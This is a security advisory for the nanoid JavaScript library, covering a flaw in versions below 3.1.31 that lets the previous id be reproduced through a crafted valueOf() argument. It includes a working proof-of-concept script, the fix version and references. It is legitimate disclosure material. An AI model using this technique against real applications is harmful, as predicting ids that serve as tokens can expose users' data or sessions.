SNYK-JS-NANOID-2332193
## Overview

Affected versions of this package are vulnerable to Information Exposure via the `valueOf()` function, which allows the last generated id to be reproduced.

## PoC

```javascript
import { nanoid } from 'nanoid';

const makeProxyNumberToReproducePreviousID = () => {
  let step = 0;
  return {
    valueOf() {
      // if (!pool || pool.length < bytes) {
      if (step === 0) {
        step++;
        return 0;
      }
      // } else if (poolOffset + bytes > pool.length) {
      if (step === 1) {
        step++;
        return -Infinity;
      }
      // poolOffset += bytes
      if (step === 2) {
        step++;
        return 0;
      }
      return 21;
    },
  };
};

const ID1 = nanoid();
const ID2 = nanoid(makeProxyNumberToReproducePreviousID());

console.log({ ID1, ID2, isIDsEqual: ID1 === ID2 });
```

## Remediation

Upgrade `nanoid` to version 3.1.31 or higher.

## References

- [GitHub Fix Commit](https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575)
- [GitHub PR](https://github.com/ai/nanoid/pull/328)
- [PoC](https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444)
Timeline
- Jan 11, 2022 CVE Updated
- Jan 12, 2022 CVE Published
References
- https://security.snyk.io/vuln/SNYK-JS-NANOID-2332193 advisory
- https://learn.snyk.io/lesson/sensitive-information-disclosure-llm/ technical
- https://github.com/ai/nanoid/commit/2b7bd9332bc49b6330c7ddb08e5c661833db2575 patch
- https://github.com/ai/nanoid/pull/328 patch
- https://gist.github.com/artalar/bc6d1eb9a3477d15d2772e876169a444 technical